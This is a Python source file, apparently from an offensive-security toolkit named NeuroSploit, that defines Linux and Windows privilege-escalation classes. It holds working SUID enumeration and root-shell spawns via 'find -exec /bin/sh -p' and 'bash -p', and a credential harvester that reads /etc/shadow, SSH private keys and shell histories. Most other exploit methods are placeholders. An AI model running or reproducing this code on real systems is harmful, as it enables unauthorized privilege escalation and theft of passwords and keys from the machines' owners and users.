CalvinBackup/NeuroSploit
1
0
Fork 0
mirror of https://github.com/CyberSecurityUP/NeuroSploit.git synced 2026-02-12 14:02:45 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
078e48b9ed213c3021797551fd75a6da78e444c7
NeuroSploit/tools/privesc/privesc_tools.py
Joas A Santos 078e48b9ed Add files via upload
2025-12-18 18:18:29 -03:00

481 lines
14 KiB
Python
Raw Blame History

#!/usr/bin/env python3
"""
Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting
"""
import subprocess
import json
import re
from typing import Dict, List
import logging
import base64
logger = logging.getLogger(__name__)
class LinuxPrivEsc:
"""Linux privilege escalation"""
def __init__(self, config: Dict):
self.config = config
def enumerate(self) -> Dict:
"""Enumerate Linux system for privilege escalation vectors"""
logger.info("Enumerating Linux system")
info = {
"os": "linux",
"kernel_version": self._get_kernel_version(),
"suid_binaries": self._find_suid_binaries(),
"sudo_permissions": self._check_sudo(),
"writable_paths": self._find_writable_paths(),
"cron_jobs": self._check_cron_jobs(),
"capabilities": self._check_capabilities()
}
return info
def _get_kernel_version(self) -> str:
"""Get kernel version"""
try:
result = subprocess.run(
['uname', '-r'],
capture_output=True,
text=True,
timeout=5
)
return result.stdout.strip()
except:
return "unknown"
def _find_suid_binaries(self) -> List[str]:
"""Find SUID binaries"""
logger.info("Searching for SUID binaries")
suid_bins = []
try:
cmd = 'find / -perm -4000 -type f 2>/dev/null'
result = subprocess.run(
cmd,
shell=True,
capture_output=True,
text=True,
timeout=60
)
suid_bins = result.stdout.strip().split('\n')
except Exception as e:
logger.error(f"SUID search error: {e}")
return suid_bins
def _check_sudo(self) -> List[str]:
"""Check sudo permissions"""
try:
result = subprocess.run(
['sudo', '-l'],
capture_output=True,
text=True,
timeout=5
)
return result.stdout.strip().split('\n')
except:
return []
def _find_writable_paths(self) -> List[str]:
"""Find writable paths in $PATH"""
writable = []
try:
paths = subprocess.run(
['echo', '$PATH'],
capture_output=True,
text=True,
shell=True
).stdout.strip().split(':')
for path in paths:
if subprocess.run(['test', '-w', path]).returncode == 0:
writable.append(path)
except:
pass
return writable
def _check_cron_jobs(self) -> List[str]:
"""Check cron jobs"""
cron_files = [
'/etc/crontab',
'/etc/cron.d/*',
'/var/spool/cron/crontabs/*'
]
jobs = []
for cron_file in cron_files:
try:
with open(cron_file, 'r') as f:
jobs.extend(f.readlines())
except:
continue
return jobs
def _check_capabilities(self) -> List[str]:
"""Check file capabilities"""
try:
result = subprocess.run(
['getcap', '-r', '/', '2>/dev/null'],
capture_output=True,
text=True,
timeout=60,
shell=True
)
return result.stdout.strip().split('\n')
except:
return []
def exploit_suid(self, binary: str) -> Dict:
"""Exploit SUID binary"""
logger.info(f"Attempting SUID exploit: {binary}")
result = {
"success": False,
"technique": "suid_exploitation",
"binary": binary
}
# Known SUID exploits
exploits = {
'/usr/bin/cp': self._exploit_cp,
'/usr/bin/mv': self._exploit_mv,
'/usr/bin/find': self._exploit_find,
'/usr/bin/vim': self._exploit_vim,
'/usr/bin/nano': self._exploit_nano,
'/bin/bash': self._exploit_bash
}
if binary in exploits:
try:
result = exploits[binary]()
except Exception as e:
result["error"] = str(e)
return result
def _exploit_find(self) -> Dict:
"""Exploit find SUID"""
try:
cmd = 'find . -exec /bin/sh -p \\; -quit'
result = subprocess.run(
cmd,
shell=True,
capture_output=True,
text=True,
timeout=10
)
return {
"success": True,
"technique": "find_suid",
"shell_obtained": True
}
except:
return {"success": False}
def _exploit_vim(self) -> Dict:
"""Exploit vim SUID"""
return {"success": False, "message": "Vim SUID exploitation placeholder"}
def _exploit_nano(self) -> Dict:
"""Exploit nano SUID"""
return {"success": False, "message": "Nano SUID exploitation placeholder"}
def _exploit_cp(self) -> Dict:
"""Exploit cp SUID"""
return {"success": False, "message": "CP SUID exploitation placeholder"}
def _exploit_mv(self) -> Dict:
"""Exploit mv SUID"""
return {"success": False, "message": "MV SUID exploitation placeholder"}
def _exploit_bash(self) -> Dict:
"""Exploit bash SUID"""
try:
cmd = 'bash -p'
result = subprocess.run(
cmd,
shell=True,
capture_output=True,
text=True,
timeout=10
)
return {
"success": True,
"technique": "bash_suid",
"shell_obtained": True
}
except:
return {"success": False}
def exploit_path_hijacking(self, writable_path: str) -> Dict:
"""Exploit PATH hijacking"""
logger.info(f"Attempting PATH hijacking: {writable_path}")
return {
"success": False,
"message": "PATH hijacking exploitation placeholder"
}
class WindowsPrivEsc:
"""Windows privilege escalation"""
def __init__(self, config: Dict):
self.config = config
def enumerate(self) -> Dict:
"""Enumerate Windows system"""
logger.info("Enumerating Windows system")
info = {
"os": "windows",
"version": self._get_windows_version(),
"services": self._enumerate_services(),
"always_install_elevated": self._check_always_install_elevated(),
"unquoted_service_paths": self._find_unquoted_paths(),
"privileges": self._check_privileges()
}
return info
def _get_windows_version(self) -> str:
"""Get Windows version"""
try:
result = subprocess.run(
['ver'],
capture_output=True,
text=True,
shell=True,
timeout=5
)
return result.stdout.strip()
except:
return "unknown"
def _enumerate_services(self) -> List[Dict]:
"""Enumerate Windows services"""
services = []
try:
result = subprocess.run(
['sc', 'query'],
capture_output=True,
text=True,
timeout=30
)
# Parse service output
for line in result.stdout.split('\n'):
if 'SERVICE_NAME:' in line:
services.append({"name": line.split(':')[1].strip()})
except:
pass
return services
def _check_always_install_elevated(self) -> bool:
"""Check AlwaysInstallElevated registry key"""
try:
# Check both HKLM and HKCU
keys = [
r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer',
r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer'
]
for key in keys:
result = subprocess.run(
['reg', 'query', key, '/v', 'AlwaysInstallElevated'],
capture_output=True,
text=True
)
if '0x1' in result.stdout:
return True
except:
pass
return False
def _find_unquoted_paths(self) -> List[str]:
"""Find unquoted service paths"""
unquoted = []
try:
result = subprocess.run(
['wmic', 'service', 'get', 'name,pathname,displayname,startmode'],
capture_output=True,
text=True,
timeout=30
)
for line in result.stdout.split('\n'):
if 'C:\\' in line and line.count('"') < 2:
unquoted.append(line)
except:
pass
return unquoted
def _check_privileges(self) -> List[str]:
"""Check current user privileges"""
try:
result = subprocess.run(
['whoami', '/priv'],
capture_output=True,
text=True,
timeout=10
)
return result.stdout.strip().split('\n')
except:
return []
def exploit_service(self, service: Dict) -> Dict:
"""Exploit service misconfiguration"""
logger.info(f"Attempting service exploitation: {service.get('name')}")
return {
"success": False,
"message": "Windows service exploitation placeholder"
}
def exploit_msi(self) -> Dict:
"""Exploit AlwaysInstallElevated"""
logger.info("Attempting AlwaysInstallElevated exploitation")
# Generate malicious MSI
# This would create and install a privileged MSI package
return {
"success": False,
"message": "AlwaysInstallElevated exploitation placeholder"
}
def impersonate_token(self) -> Dict:
"""Token impersonation attack"""
logger.info("Attempting token impersonation")
return {
"success": False,
"message": "Token impersonation placeholder"
}
class KernelExploiter:
"""Kernel exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit_linux(self, kernel_version: str) -> Dict:
"""Exploit Linux kernel"""
logger.info(f"Attempting kernel exploit: {kernel_version}")
# Map kernel versions to known exploits
exploits = {
'DirtyCow': ['2.6.22', '4.8.3'],
'OverlayFS': ['3.13.0', '4.3.3']
}
return {
"success": False,
"message": "Kernel exploitation requires specific exploit compilation"
}
class MisconfigFinder:
"""Find misconfigurations"""
def __init__(self, config: Dict):
self.config = config
def find(self, os_type: str) -> List[Dict]:
"""Find security misconfigurations"""
if os_type == "linux":
return self._find_linux_misconfigs()
elif os_type == "windows":
return self._find_windows_misconfigs()
return []
def _find_linux_misconfigs(self) -> List[Dict]:
"""Find Linux misconfigurations"""
return []
def _find_windows_misconfigs(self) -> List[Dict]:
"""Find Windows misconfigurations"""
return []
class CredentialHarvester:
"""Harvest credentials"""
def __init__(self, config: Dict):
self.config = config
def harvest_linux(self) -> List[Dict]:
"""Harvest Linux credentials"""
logger.info("Harvesting Linux credentials")
credentials = []
# Check common credential locations
locations = [
'/etc/shadow',
'/etc/passwd',
'~/.ssh/id_rsa',
'~/.bash_history',
'~/.mysql_history'
]
for location in locations:
try:
with open(location, 'r') as f:
credentials.append({
"source": location,
"data": f.read()[:500]
})
except:
continue
return credentials
def harvest_windows(self) -> List[Dict]:
"""Harvest Windows credentials"""
logger.info("Harvesting Windows credentials")
# Use mimikatz or similar tools
# Placeholder for demonstration
return []
class SudoExploiter:
"""Sudo exploitation"""
def __init__(self, config: Dict):
self.config = config
def exploit(self, sudo_permission: str) -> Dict:
"""Exploit sudo permission"""
logger.info(f"Attempting sudo exploit: {sudo_permission}")
return {
"success": False,
"message": "Sudo exploitation placeholder"
}
Reference in New Issue View Git Blame Copy Permalink